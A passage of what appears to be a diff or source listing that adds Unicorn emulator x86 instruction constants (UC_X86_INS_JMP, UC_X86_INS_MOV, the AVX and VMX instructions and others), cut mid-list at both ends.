UC_X86_INS_INVPCID, + UC_X86_INS_INVVPID, + UC_X86_INS_IRET, + UC_X86_INS_IRETD, + UC_X86_INS_IRETQ, + UC_X86_INS_FISTTP, + UC_X86_INS_FIST, + UC_X86_INS_FISTP, + UC_X86_INS_UCOMISD, + UC_X86_INS_UCOMISS, + UC_X86_INS_VCOMISD, + UC_X86_INS_VCOMISS, + UC_X86_INS_VCVTSD2SS, + UC_X86_INS_VCVTSI2SD, + UC_X86_INS_VCVTSI2SS, + UC_X86_INS_VCVTSS2SD, + UC_X86_INS_VCVTTSD2SI, + UC_X86_INS_VCVTTSD2USI, + UC_X86_INS_VCVTTSS2SI, + UC_X86_INS_VCVTTSS2USI, + UC_X86_INS_VCVTUSI2SD, + UC_X86_INS_VCVTUSI2SS, + UC_X86_INS_VUCOMISD, + 
UC_X86_INS_VUCOMISS, + UC_X86_INS_JAE, + UC_X86_INS_JA, + UC_X86_INS_JBE, + UC_X86_INS_JB, + UC_X86_INS_JCXZ, + UC_X86_INS_JECXZ, + UC_X86_INS_JE, + UC_X86_INS_JGE, + UC_X86_INS_JG, + UC_X86_INS_JLE, + UC_X86_INS_JL, + UC_X86_INS_JMP, + UC_X86_INS_JNE, + UC_X86_INS_JNO, + UC_X86_INS_JNP, + UC_X86_INS_JNS, + UC_X86_INS_JO, + UC_X86_INS_JP, + UC_X86_INS_JRCXZ, + UC_X86_INS_JS, + UC_X86_INS_KANDB, + UC_X86_INS_KANDD, + UC_X86_INS_KANDNB, + UC_X86_INS_KANDND, + UC_X86_INS_KANDNQ, + UC_X86_INS_KANDNW, + UC_X86_INS_KANDQ, + UC_X86_INS_KANDW, + UC_X86_INS_KMOVB, + UC_X86_INS_KMOVD, + UC_X86_INS_KMOVQ, + UC_X86_INS_KMOVW, + UC_X86_INS_KNOTB, + UC_X86_INS_KNOTD, + UC_X86_INS_KNOTQ, + UC_X86_INS_KNOTW, + UC_X86_INS_KORB, + UC_X86_INS_KORD, + UC_X86_INS_KORQ, + UC_X86_INS_KORTESTB, + UC_X86_INS_KORTESTD, + UC_X86_INS_KORTESTQ, + UC_X86_INS_KORTESTW, + UC_X86_INS_KORW, + UC_X86_INS_KSHIFTLB, + UC_X86_INS_KSHIFTLD, + UC_X86_INS_KSHIFTLQ, + UC_X86_INS_KSHIFTLW, + UC_X86_INS_KSHIFTRB, + UC_X86_INS_KSHIFTRD, + UC_X86_INS_KSHIFTRQ, + UC_X86_INS_KSHIFTRW, + UC_X86_INS_KUNPCKBW, + UC_X86_INS_KXNORB, + UC_X86_INS_KXNORD, + UC_X86_INS_KXNORQ, + UC_X86_INS_KXNORW, + UC_X86_INS_KXORB, + UC_X86_INS_KXORD, + UC_X86_INS_KXORQ, + UC_X86_INS_KXORW, + UC_X86_INS_LAHF, + UC_X86_INS_LAR, + UC_X86_INS_LDDQU, + UC_X86_INS_LDMXCSR, + UC_X86_INS_LDS, + UC_X86_INS_FLDZ, + UC_X86_INS_FLD1, + UC_X86_INS_FLD, + UC_X86_INS_LEA, + UC_X86_INS_LEAVE, + UC_X86_INS_LES, + UC_X86_INS_LFENCE, + UC_X86_INS_LFS, + UC_X86_INS_LGDT, + UC_X86_INS_LGS, + UC_X86_INS_LIDT, + UC_X86_INS_LLDT, + UC_X86_INS_LMSW, + UC_X86_INS_OR, + UC_X86_INS_SUB, + UC_X86_INS_XOR, + UC_X86_INS_LODSB, + UC_X86_INS_LODSD, + UC_X86_INS_LODSQ, + UC_X86_INS_LODSW, + UC_X86_INS_LOOP, + UC_X86_INS_LOOPE, + UC_X86_INS_LOOPNE, + UC_X86_INS_RETF, + UC_X86_INS_RETFQ, + UC_X86_INS_LSL, + UC_X86_INS_LSS, + UC_X86_INS_LTR, + UC_X86_INS_XADD, + UC_X86_INS_LZCNT, + UC_X86_INS_MASKMOVDQU, + UC_X86_INS_MAXPD, + UC_X86_INS_MAXPS, + UC_X86_INS_MAXSD, + 
UC_X86_INS_MAXSS, + UC_X86_INS_MFENCE, + UC_X86_INS_MINPD, + UC_X86_INS_MINPS, + UC_X86_INS_MINSD, + UC_X86_INS_MINSS, + UC_X86_INS_CVTPD2PI, + UC_X86_INS_CVTPI2PD, + UC_X86_INS_CVTPI2PS, + UC_X86_INS_CVTPS2PI, + UC_X86_INS_CVTTPD2PI, + UC_X86_INS_CVTTPS2PI, + UC_X86_INS_EMMS, + UC_X86_INS_MASKMOVQ, + UC_X86_INS_MOVD, + UC_X86_INS_MOVDQ2Q, + UC_X86_INS_MOVNTQ, + UC_X86_INS_MOVQ2DQ, + UC_X86_INS_MOVQ, + UC_X86_INS_PABSB, + UC_X86_INS_PABSD, + UC_X86_INS_PABSW, + UC_X86_INS_PACKSSDW, + UC_X86_INS_PACKSSWB, + UC_X86_INS_PACKUSWB, + UC_X86_INS_PADDB, + UC_X86_INS_PADDD, + UC_X86_INS_PADDQ, + UC_X86_INS_PADDSB, + UC_X86_INS_PADDSW, + UC_X86_INS_PADDUSB, + UC_X86_INS_PADDUSW, + UC_X86_INS_PADDW, + UC_X86_INS_PALIGNR, + UC_X86_INS_PANDN, + UC_X86_INS_PAND, + UC_X86_INS_PAVGB, + UC_X86_INS_PAVGW, + UC_X86_INS_PCMPEQB, + UC_X86_INS_PCMPEQD, + UC_X86_INS_PCMPEQW, + UC_X86_INS_PCMPGTB, + UC_X86_INS_PCMPGTD, + UC_X86_INS_PCMPGTW, + UC_X86_INS_PEXTRW, + UC_X86_INS_PHADDSW, + UC_X86_INS_PHADDW, + UC_X86_INS_PHADDD, + UC_X86_INS_PHSUBD, + UC_X86_INS_PHSUBSW, + UC_X86_INS_PHSUBW, + UC_X86_INS_PINSRW, + UC_X86_INS_PMADDUBSW, + UC_X86_INS_PMADDWD, + UC_X86_INS_PMAXSW, + UC_X86_INS_PMAXUB, + UC_X86_INS_PMINSW, + UC_X86_INS_PMINUB, + UC_X86_INS_PMOVMSKB, + UC_X86_INS_PMULHRSW, + UC_X86_INS_PMULHUW, + UC_X86_INS_PMULHW, + UC_X86_INS_PMULLW, + UC_X86_INS_PMULUDQ, + UC_X86_INS_POR, + UC_X86_INS_PSADBW, + UC_X86_INS_PSHUFB, + UC_X86_INS_PSHUFW, + UC_X86_INS_PSIGNB, + UC_X86_INS_PSIGND, + UC_X86_INS_PSIGNW, + UC_X86_INS_PSLLD, + UC_X86_INS_PSLLQ, + UC_X86_INS_PSLLW, + UC_X86_INS_PSRAD, + UC_X86_INS_PSRAW, + UC_X86_INS_PSRLD, + UC_X86_INS_PSRLQ, + UC_X86_INS_PSRLW, + UC_X86_INS_PSUBB, + UC_X86_INS_PSUBD, + UC_X86_INS_PSUBQ, + UC_X86_INS_PSUBSB, + UC_X86_INS_PSUBSW, + UC_X86_INS_PSUBUSB, + UC_X86_INS_PSUBUSW, + UC_X86_INS_PSUBW, + UC_X86_INS_PUNPCKHBW, + UC_X86_INS_PUNPCKHDQ, + UC_X86_INS_PUNPCKHWD, + UC_X86_INS_PUNPCKLBW, + UC_X86_INS_PUNPCKLDQ, + UC_X86_INS_PUNPCKLWD, + UC_X86_INS_PXOR, + 
UC_X86_INS_MONITOR, + UC_X86_INS_MONTMUL, + UC_X86_INS_MOV, + UC_X86_INS_MOVABS, + UC_X86_INS_MOVBE, + UC_X86_INS_MOVDDUP, + UC_X86_INS_MOVDQA, + UC_X86_INS_MOVDQU, + UC_X86_INS_MOVHLPS, + UC_X86_INS_MOVHPD, + UC_X86_INS_MOVHPS, + UC_X86_INS_MOVLHPS, + UC_X86_INS_MOVLPD, + UC_X86_INS_MOVLPS, + UC_X86_INS_MOVMSKPD, + UC_X86_INS_MOVMSKPS, + UC_X86_INS_MOVNTDQA, + UC_X86_INS_MOVNTDQ, + UC_X86_INS_MOVNTI, + UC_X86_INS_MOVNTPD, + UC_X86_INS_MOVNTPS, + UC_X86_INS_MOVNTSD, + UC_X86_INS_MOVNTSS, + UC_X86_INS_MOVSB, + UC_X86_INS_MOVSD, + UC_X86_INS_MOVSHDUP, + UC_X86_INS_MOVSLDUP, + UC_X86_INS_MOVSQ, + UC_X86_INS_MOVSS, + UC_X86_INS_MOVSW, + UC_X86_INS_MOVSX, + UC_X86_INS_MOVSXD, + UC_X86_INS_MOVUPD, + UC_X86_INS_MOVUPS, + UC_X86_INS_MOVZX, + UC_X86_INS_MPSADBW, + UC_X86_INS_MUL, + UC_X86_INS_MULPD, + UC_X86_INS_MULPS, + UC_X86_INS_MULSD, + UC_X86_INS_MULSS, + UC_X86_INS_MULX, + UC_X86_INS_FMUL, + UC_X86_INS_FIMUL, + UC_X86_INS_FMULP, + UC_X86_INS_MWAIT, + UC_X86_INS_NEG, + UC_X86_INS_NOP, + UC_X86_INS_NOT, + UC_X86_INS_OUT, + UC_X86_INS_OUTSB, + UC_X86_INS_OUTSD, + UC_X86_INS_OUTSW, + UC_X86_INS_PACKUSDW, + UC_X86_INS_PAUSE, + UC_X86_INS_PAVGUSB, + UC_X86_INS_PBLENDVB, + UC_X86_INS_PBLENDW, + UC_X86_INS_PCLMULQDQ, + UC_X86_INS_PCMPEQQ, + UC_X86_INS_PCMPESTRI, + UC_X86_INS_PCMPESTRM, + UC_X86_INS_PCMPGTQ, + UC_X86_INS_PCMPISTRI, + UC_X86_INS_PCMPISTRM, + UC_X86_INS_PCOMMIT, + UC_X86_INS_PDEP, + UC_X86_INS_PEXT, + UC_X86_INS_PEXTRB, + UC_X86_INS_PEXTRD, + UC_X86_INS_PEXTRQ, + UC_X86_INS_PF2ID, + UC_X86_INS_PF2IW, + UC_X86_INS_PFACC, + UC_X86_INS_PFADD, + UC_X86_INS_PFCMPEQ, + UC_X86_INS_PFCMPGE, + UC_X86_INS_PFCMPGT, + UC_X86_INS_PFMAX, + UC_X86_INS_PFMIN, + UC_X86_INS_PFMUL, + UC_X86_INS_PFNACC, + UC_X86_INS_PFPNACC, + UC_X86_INS_PFRCPIT1, + UC_X86_INS_PFRCPIT2, + UC_X86_INS_PFRCP, + UC_X86_INS_PFRSQIT1, + UC_X86_INS_PFRSQRT, + UC_X86_INS_PFSUBR, + UC_X86_INS_PFSUB, + UC_X86_INS_PHMINPOSUW, + UC_X86_INS_PI2FD, + UC_X86_INS_PI2FW, + UC_X86_INS_PINSRB, + UC_X86_INS_PINSRD, + 
UC_X86_INS_PINSRQ, + UC_X86_INS_PMAXSB, + UC_X86_INS_PMAXSD, + UC_X86_INS_PMAXUD, + UC_X86_INS_PMAXUW, + UC_X86_INS_PMINSB, + UC_X86_INS_PMINSD, + UC_X86_INS_PMINUD, + UC_X86_INS_PMINUW, + UC_X86_INS_PMOVSXBD, + UC_X86_INS_PMOVSXBQ, + UC_X86_INS_PMOVSXBW, + UC_X86_INS_PMOVSXDQ, + UC_X86_INS_PMOVSXWD, + UC_X86_INS_PMOVSXWQ, + UC_X86_INS_PMOVZXBD, + UC_X86_INS_PMOVZXBQ, + UC_X86_INS_PMOVZXBW, + UC_X86_INS_PMOVZXDQ, + UC_X86_INS_PMOVZXWD, + UC_X86_INS_PMOVZXWQ, + UC_X86_INS_PMULDQ, + UC_X86_INS_PMULHRW, + UC_X86_INS_PMULLD, + UC_X86_INS_POP, + UC_X86_INS_POPAW, + UC_X86_INS_POPAL, + UC_X86_INS_POPCNT, + UC_X86_INS_POPF, + UC_X86_INS_POPFD, + UC_X86_INS_POPFQ, + UC_X86_INS_PREFETCH, + UC_X86_INS_PREFETCHNTA, + UC_X86_INS_PREFETCHT0, + UC_X86_INS_PREFETCHT1, + UC_X86_INS_PREFETCHT2, + UC_X86_INS_PREFETCHW, + UC_X86_INS_PSHUFD, + UC_X86_INS_PSHUFHW, + UC_X86_INS_PSHUFLW, + UC_X86_INS_PSLLDQ, + UC_X86_INS_PSRLDQ, + UC_X86_INS_PSWAPD, + UC_X86_INS_PTEST, + UC_X86_INS_PUNPCKHQDQ, + UC_X86_INS_PUNPCKLQDQ, + UC_X86_INS_PUSH, + UC_X86_INS_PUSHAW, + UC_X86_INS_PUSHAL, + UC_X86_INS_PUSHF, + UC_X86_INS_PUSHFD, + UC_X86_INS_PUSHFQ, + UC_X86_INS_RCL, + UC_X86_INS_RCPPS, + UC_X86_INS_RCPSS, + UC_X86_INS_RCR, + UC_X86_INS_RDFSBASE, + UC_X86_INS_RDGSBASE, + UC_X86_INS_RDMSR, + UC_X86_INS_RDPMC, + UC_X86_INS_RDRAND, + UC_X86_INS_RDSEED, + UC_X86_INS_RDTSC, + UC_X86_INS_RDTSCP, + UC_X86_INS_ROL, + UC_X86_INS_ROR, + UC_X86_INS_RORX, + UC_X86_INS_ROUNDPD, + UC_X86_INS_ROUNDPS, + UC_X86_INS_ROUNDSD, + UC_X86_INS_ROUNDSS, + UC_X86_INS_RSM, + UC_X86_INS_RSQRTPS, + UC_X86_INS_RSQRTSS, + UC_X86_INS_SAHF, + UC_X86_INS_SAL, + UC_X86_INS_SALC, + UC_X86_INS_SAR, + UC_X86_INS_SARX, + UC_X86_INS_SBB, + UC_X86_INS_SCASB, + UC_X86_INS_SCASD, + UC_X86_INS_SCASQ, + UC_X86_INS_SCASW, + UC_X86_INS_SETAE, + UC_X86_INS_SETA, + UC_X86_INS_SETBE, + UC_X86_INS_SETB, + UC_X86_INS_SETE, + UC_X86_INS_SETGE, + UC_X86_INS_SETG, + UC_X86_INS_SETLE, + UC_X86_INS_SETL, + UC_X86_INS_SETNE, + UC_X86_INS_SETNO, + 
UC_X86_INS_SETNP, + UC_X86_INS_SETNS, + UC_X86_INS_SETO, + UC_X86_INS_SETP, + UC_X86_INS_SETS, + UC_X86_INS_SFENCE, + UC_X86_INS_SGDT, + UC_X86_INS_SHA1MSG1, + UC_X86_INS_SHA1MSG2, + UC_X86_INS_SHA1NEXTE, + UC_X86_INS_SHA1RNDS4, + UC_X86_INS_SHA256MSG1, + UC_X86_INS_SHA256MSG2, + UC_X86_INS_SHA256RNDS2, + UC_X86_INS_SHL, + UC_X86_INS_SHLD, + UC_X86_INS_SHLX, + UC_X86_INS_SHR, + UC_X86_INS_SHRD, + UC_X86_INS_SHRX, + UC_X86_INS_SHUFPD, + UC_X86_INS_SHUFPS, + UC_X86_INS_SIDT, + UC_X86_INS_FSIN, + UC_X86_INS_SKINIT, + UC_X86_INS_SLDT, + UC_X86_INS_SMSW, + UC_X86_INS_SQRTPD, + UC_X86_INS_SQRTPS, + UC_X86_INS_SQRTSD, + UC_X86_INS_SQRTSS, + UC_X86_INS_FSQRT, + UC_X86_INS_STAC, + UC_X86_INS_STC, + UC_X86_INS_STD, + UC_X86_INS_STGI, + UC_X86_INS_STI, + UC_X86_INS_STMXCSR, + UC_X86_INS_STOSB, + UC_X86_INS_STOSD, + UC_X86_INS_STOSQ, + UC_X86_INS_STOSW, + UC_X86_INS_STR, + UC_X86_INS_FST, + UC_X86_INS_FSTP, + UC_X86_INS_FSTPNCE, + UC_X86_INS_FXCH, + UC_X86_INS_SUBPD, + UC_X86_INS_SUBPS, + UC_X86_INS_FSUBR, + UC_X86_INS_FISUBR, + UC_X86_INS_FSUBRP, + UC_X86_INS_SUBSD, + UC_X86_INS_SUBSS, + UC_X86_INS_FSUB, + UC_X86_INS_FISUB, + UC_X86_INS_FSUBP, + UC_X86_INS_SWAPGS, + UC_X86_INS_SYSCALL, + UC_X86_INS_SYSENTER, + UC_X86_INS_SYSEXIT, + UC_X86_INS_SYSRET, + UC_X86_INS_T1MSKC, + UC_X86_INS_TEST, + UC_X86_INS_UD2, + UC_X86_INS_FTST, + UC_X86_INS_TZCNT, + UC_X86_INS_TZMSK, + UC_X86_INS_FUCOMPI, + UC_X86_INS_FUCOMI, + UC_X86_INS_FUCOMPP, + UC_X86_INS_FUCOMP, + UC_X86_INS_FUCOM, + UC_X86_INS_UD2B, + UC_X86_INS_UNPCKHPD, + UC_X86_INS_UNPCKHPS, + UC_X86_INS_UNPCKLPD, + UC_X86_INS_UNPCKLPS, + UC_X86_INS_VADDPD, + UC_X86_INS_VADDPS, + UC_X86_INS_VADDSD, + UC_X86_INS_VADDSS, + UC_X86_INS_VADDSUBPD, + UC_X86_INS_VADDSUBPS, + UC_X86_INS_VAESDECLAST, + UC_X86_INS_VAESDEC, + UC_X86_INS_VAESENCLAST, + UC_X86_INS_VAESENC, + UC_X86_INS_VAESIMC, + UC_X86_INS_VAESKEYGENASSIST, + UC_X86_INS_VALIGND, + UC_X86_INS_VALIGNQ, + UC_X86_INS_VANDNPD, + UC_X86_INS_VANDNPS, + UC_X86_INS_VANDPD, + 
UC_X86_INS_VANDPS, + UC_X86_INS_VBLENDMPD, + UC_X86_INS_VBLENDMPS, + UC_X86_INS_VBLENDPD, + UC_X86_INS_VBLENDPS, + UC_X86_INS_VBLENDVPD, + UC_X86_INS_VBLENDVPS, + UC_X86_INS_VBROADCASTF128, + UC_X86_INS_VBROADCASTI32X4, + UC_X86_INS_VBROADCASTI64X4, + UC_X86_INS_VBROADCASTSD, + UC_X86_INS_VBROADCASTSS, + UC_X86_INS_VCMPPD, + UC_X86_INS_VCMPPS, + UC_X86_INS_VCMPSD, + UC_X86_INS_VCMPSS, + UC_X86_INS_VCOMPRESSPD, + UC_X86_INS_VCOMPRESSPS, + UC_X86_INS_VCVTDQ2PD, + UC_X86_INS_VCVTDQ2PS, + UC_X86_INS_VCVTPD2DQX, + UC_X86_INS_VCVTPD2DQ, + UC_X86_INS_VCVTPD2PSX, + UC_X86_INS_VCVTPD2PS, + UC_X86_INS_VCVTPD2UDQ, + UC_X86_INS_VCVTPH2PS, + UC_X86_INS_VCVTPS2DQ, + UC_X86_INS_VCVTPS2PD, + UC_X86_INS_VCVTPS2PH, + UC_X86_INS_VCVTPS2UDQ, + UC_X86_INS_VCVTSD2SI, + UC_X86_INS_VCVTSD2USI, + UC_X86_INS_VCVTSS2SI, + UC_X86_INS_VCVTSS2USI, + UC_X86_INS_VCVTTPD2DQX, + UC_X86_INS_VCVTTPD2DQ, + UC_X86_INS_VCVTTPD2UDQ, + UC_X86_INS_VCVTTPS2DQ, + UC_X86_INS_VCVTTPS2UDQ, + UC_X86_INS_VCVTUDQ2PD, + UC_X86_INS_VCVTUDQ2PS, + UC_X86_INS_VDIVPD, + UC_X86_INS_VDIVPS, + UC_X86_INS_VDIVSD, + UC_X86_INS_VDIVSS, + UC_X86_INS_VDPPD, + UC_X86_INS_VDPPS, + UC_X86_INS_VERR, + UC_X86_INS_VERW, + UC_X86_INS_VEXP2PD, + UC_X86_INS_VEXP2PS, + UC_X86_INS_VEXPANDPD, + UC_X86_INS_VEXPANDPS, + UC_X86_INS_VEXTRACTF128, + UC_X86_INS_VEXTRACTF32X4, + UC_X86_INS_VEXTRACTF64X4, + UC_X86_INS_VEXTRACTI128, + UC_X86_INS_VEXTRACTI32X4, + UC_X86_INS_VEXTRACTI64X4, + UC_X86_INS_VEXTRACTPS, + UC_X86_INS_VFMADD132PD, + UC_X86_INS_VFMADD132PS, + UC_X86_INS_VFMADDPD, + UC_X86_INS_VFMADD213PD, + UC_X86_INS_VFMADD231PD, + UC_X86_INS_VFMADDPS, + UC_X86_INS_VFMADD213PS, + UC_X86_INS_VFMADD231PS, + UC_X86_INS_VFMADDSD, + UC_X86_INS_VFMADD213SD, + UC_X86_INS_VFMADD132SD, + UC_X86_INS_VFMADD231SD, + UC_X86_INS_VFMADDSS, + UC_X86_INS_VFMADD213SS, + UC_X86_INS_VFMADD132SS, + UC_X86_INS_VFMADD231SS, + UC_X86_INS_VFMADDSUB132PD, + UC_X86_INS_VFMADDSUB132PS, + UC_X86_INS_VFMADDSUBPD, + UC_X86_INS_VFMADDSUB213PD, + UC_X86_INS_VFMADDSUB231PD, 
+ UC_X86_INS_VFMADDSUBPS, + UC_X86_INS_VFMADDSUB213PS, + UC_X86_INS_VFMADDSUB231PS, + UC_X86_INS_VFMSUB132PD, + UC_X86_INS_VFMSUB132PS, + UC_X86_INS_VFMSUBADD132PD, + UC_X86_INS_VFMSUBADD132PS, + UC_X86_INS_VFMSUBADDPD, + UC_X86_INS_VFMSUBADD213PD, + UC_X86_INS_VFMSUBADD231PD, + UC_X86_INS_VFMSUBADDPS, + UC_X86_INS_VFMSUBADD213PS, + UC_X86_INS_VFMSUBADD231PS, + UC_X86_INS_VFMSUBPD, + UC_X86_INS_VFMSUB213PD, + UC_X86_INS_VFMSUB231PD, + UC_X86_INS_VFMSUBPS, + UC_X86_INS_VFMSUB213PS, + UC_X86_INS_VFMSUB231PS, + UC_X86_INS_VFMSUBSD, + UC_X86_INS_VFMSUB213SD, + UC_X86_INS_VFMSUB132SD, + UC_X86_INS_VFMSUB231SD, + UC_X86_INS_VFMSUBSS, + UC_X86_INS_VFMSUB213SS, + UC_X86_INS_VFMSUB132SS, + UC_X86_INS_VFMSUB231SS, + UC_X86_INS_VFNMADD132PD, + UC_X86_INS_VFNMADD132PS, + UC_X86_INS_VFNMADDPD, + UC_X86_INS_VFNMADD213PD, + UC_X86_INS_VFNMADD231PD, + UC_X86_INS_VFNMADDPS, + UC_X86_INS_VFNMADD213PS, + UC_X86_INS_VFNMADD231PS, + UC_X86_INS_VFNMADDSD, + UC_X86_INS_VFNMADD213SD, + UC_X86_INS_VFNMADD132SD, + UC_X86_INS_VFNMADD231SD, + UC_X86_INS_VFNMADDSS, + UC_X86_INS_VFNMADD213SS, + UC_X86_INS_VFNMADD132SS, + UC_X86_INS_VFNMADD231SS, + UC_X86_INS_VFNMSUB132PD, + UC_X86_INS_VFNMSUB132PS, + UC_X86_INS_VFNMSUBPD, + UC_X86_INS_VFNMSUB213PD, + UC_X86_INS_VFNMSUB231PD, + UC_X86_INS_VFNMSUBPS, + UC_X86_INS_VFNMSUB213PS, + UC_X86_INS_VFNMSUB231PS, + UC_X86_INS_VFNMSUBSD, + UC_X86_INS_VFNMSUB213SD, + UC_X86_INS_VFNMSUB132SD, + UC_X86_INS_VFNMSUB231SD, + UC_X86_INS_VFNMSUBSS, + UC_X86_INS_VFNMSUB213SS, + UC_X86_INS_VFNMSUB132SS, + UC_X86_INS_VFNMSUB231SS, + UC_X86_INS_VFRCZPD, + UC_X86_INS_VFRCZPS, + UC_X86_INS_VFRCZSD, + UC_X86_INS_VFRCZSS, + UC_X86_INS_VORPD, + UC_X86_INS_VORPS, + UC_X86_INS_VXORPD, + UC_X86_INS_VXORPS, + UC_X86_INS_VGATHERDPD, + UC_X86_INS_VGATHERDPS, + UC_X86_INS_VGATHERPF0DPD, + UC_X86_INS_VGATHERPF0DPS, + UC_X86_INS_VGATHERPF0QPD, + UC_X86_INS_VGATHERPF0QPS, + UC_X86_INS_VGATHERPF1DPD, + UC_X86_INS_VGATHERPF1DPS, + UC_X86_INS_VGATHERPF1QPD, + UC_X86_INS_VGATHERPF1QPS, + 
UC_X86_INS_VGATHERQPD, + UC_X86_INS_VGATHERQPS, + UC_X86_INS_VHADDPD, + UC_X86_INS_VHADDPS, + UC_X86_INS_VHSUBPD, + UC_X86_INS_VHSUBPS, + UC_X86_INS_VINSERTF128, + UC_X86_INS_VINSERTF32X4, + UC_X86_INS_VINSERTF32X8, + UC_X86_INS_VINSERTF64X2, + UC_X86_INS_VINSERTF64X4, + UC_X86_INS_VINSERTI128, + UC_X86_INS_VINSERTI32X4, + UC_X86_INS_VINSERTI32X8, + UC_X86_INS_VINSERTI64X2, + UC_X86_INS_VINSERTI64X4, + UC_X86_INS_VINSERTPS, + UC_X86_INS_VLDDQU, + UC_X86_INS_VLDMXCSR, + UC_X86_INS_VMASKMOVDQU, + UC_X86_INS_VMASKMOVPD, + UC_X86_INS_VMASKMOVPS, + UC_X86_INS_VMAXPD, + UC_X86_INS_VMAXPS, + UC_X86_INS_VMAXSD, + UC_X86_INS_VMAXSS, + UC_X86_INS_VMCALL, + UC_X86_INS_VMCLEAR, + UC_X86_INS_VMFUNC, + UC_X86_INS_VMINPD, + UC_X86_INS_VMINPS, + UC_X86_INS_VMINSD, + UC_X86_INS_VMINSS, + UC_X86_INS_VMLAUNCH, + UC_X86_INS_VMLOAD, + UC_X86_INS_VMMCALL, + UC_X86_INS_VMOVQ, + UC_X86_INS_VMOVDDUP, + UC_X86_INS_VMOVD, + UC_X86_INS_VMOVDQA32, + UC_X86_INS_VMOVDQA64, + UC_X86_INS_VMOVDQA, + UC_X86_INS_VMOVDQU16, + UC_X86_INS_VMOVDQU32, + UC_X86_INS_VMOVDQU64, + UC_X86_INS_VMOVDQU8, + UC_X86_INS_VMOVDQU, + UC_X86_INS_VMOVHLPS, + UC_X86_INS_VMOVHPD, + UC_X86_INS_VMOVHPS, + UC_X86_INS_VMOVLHPS, + UC_X86_INS_VMOVLPD, + UC_X86_INS_VMOVLPS, + UC_X86_INS_VMOVMSKPD, + UC_X86_INS_VMOVMSKPS, + UC_X86_INS_VMOVNTDQA, + UC_X86_INS_VMOVNTDQ, + UC_X86_INS_VMOVNTPD, + UC_X86_INS_VMOVNTPS, + UC_X86_INS_VMOVSD, + UC_X86_INS_VMOVSHDUP, + UC_X86_INS_VMOVSLDUP, + UC_X86_INS_VMOVSS, + UC_X86_INS_VMOVUPD, + UC_X86_INS_VMOVUPS, + UC_X86_INS_VMPSADBW, + UC_X86_INS_VMPTRLD, + UC_X86_INS_VMPTRST, + UC_X86_INS_VMREAD, + UC_X86_INS_VMRESUME, + UC_X86_INS_VMRUN, + UC_X86_INS_VMSAVE, + UC_X86_INS_VMULPD, + UC_X86_INS_VMULPS, + UC_X86_INS_VMULSD, + UC_X86_INS_VMULSS, + UC_X86_INS_VMWRITE, + UC_X86_INS_VMXOFF, + UC_X86_INS_VMXON, + UC_X86_INS_VPABSB, + UC_X86_INS_VPABSD, + UC_X86_INS_VPABSQ, + UC_X86_INS_VPABSW, + UC_X86_INS_VPACKSSDW, + UC_X86_INS_VPACKSSWB, + UC_X86_INS_VPACKUSDW, + UC_X86_INS_VPACKUSWB, + 
UC_X86_INS_VPADDB, + UC_X86_INS_VPADDD, + UC_X86_INS_VPADDQ, + UC_X86_INS_VPADDSB, + UC_X86_INS_VPADDSW, + UC_X86_INS_VPADDUSB, + UC_X86_INS_VPADDUSW, + UC_X86_INS_VPADDW, + UC_X86_INS_VPALIGNR, + UC_X86_INS_VPANDD, + UC_X86_INS_VPANDND, + UC_X86_INS_VPANDNQ, + UC_X86_INS_VPANDN, + UC_X86_INS_VPANDQ, + UC_X86_INS_VPAND, + UC_X86_INS_VPAVGB, + UC_X86_INS_VPAVGW, + UC_X86_INS_VPBLENDD, + UC_X86_INS_VPBLENDMB, + UC_X86_INS_VPBLENDMD, + UC_X86_INS_VPBLENDMQ, + UC_X86_INS_VPBLENDMW, + UC_X86_INS_VPBLENDVB, + UC_X86_INS_VPBLENDW, + UC_X86_INS_VPBROADCASTB, + UC_X86_INS_VPBROADCASTD, + UC_X86_INS_VPBROADCASTMB2Q, + UC_X86_INS_VPBROADCASTMW2D, + UC_X86_INS_VPBROADCASTQ, + UC_X86_INS_VPBROADCASTW, + UC_X86_INS_VPCLMULQDQ, + UC_X86_INS_VPCMOV, + UC_X86_INS_VPCMPB, + UC_X86_INS_VPCMPD, + UC_X86_INS_VPCMPEQB, + UC_X86_INS_VPCMPEQD, + UC_X86_INS_VPCMPEQQ, + UC_X86_INS_VPCMPEQW, + UC_X86_INS_VPCMPESTRI, + UC_X86_INS_VPCMPESTRM, + UC_X86_INS_VPCMPGTB, + UC_X86_INS_VPCMPGTD, + UC_X86_INS_VPCMPGTQ, + UC_X86_INS_VPCMPGTW, + UC_X86_INS_VPCMPISTRI, + UC_X86_INS_VPCMPISTRM, + UC_X86_INS_VPCMPQ, + UC_X86_INS_VPCMPUB, + UC_X86_INS_VPCMPUD, + UC_X86_INS_VPCMPUQ, + UC_X86_INS_VPCMPUW, + UC_X86_INS_VPCMPW, + UC_X86_INS_VPCOMB, + UC_X86_INS_VPCOMD, + UC_X86_INS_VPCOMPRESSD, + UC_X86_INS_VPCOMPRESSQ, + UC_X86_INS_VPCOMQ, + UC_X86_INS_VPCOMUB, + UC_X86_INS_VPCOMUD, + UC_X86_INS_VPCOMUQ, + UC_X86_INS_VPCOMUW, + UC_X86_INS_VPCOMW, + UC_X86_INS_VPCONFLICTD, + UC_X86_INS_VPCONFLICTQ, + UC_X86_INS_VPERM2F128, + UC_X86_INS_VPERM2I128, + UC_X86_INS_VPERMD, + UC_X86_INS_VPERMI2D, + UC_X86_INS_VPERMI2PD, + UC_X86_INS_VPERMI2PS, + UC_X86_INS_VPERMI2Q, + UC_X86_INS_VPERMIL2PD, + UC_X86_INS_VPERMIL2PS, + UC_X86_INS_VPERMILPD, + UC_X86_INS_VPERMILPS, + UC_X86_INS_VPERMPD, + UC_X86_INS_VPERMPS, + UC_X86_INS_VPERMQ, + UC_X86_INS_VPERMT2D, + UC_X86_INS_VPERMT2PD, + UC_X86_INS_VPERMT2PS, + UC_X86_INS_VPERMT2Q, + UC_X86_INS_VPEXPANDD, + UC_X86_INS_VPEXPANDQ, + UC_X86_INS_VPEXTRB, + UC_X86_INS_VPEXTRD, + 
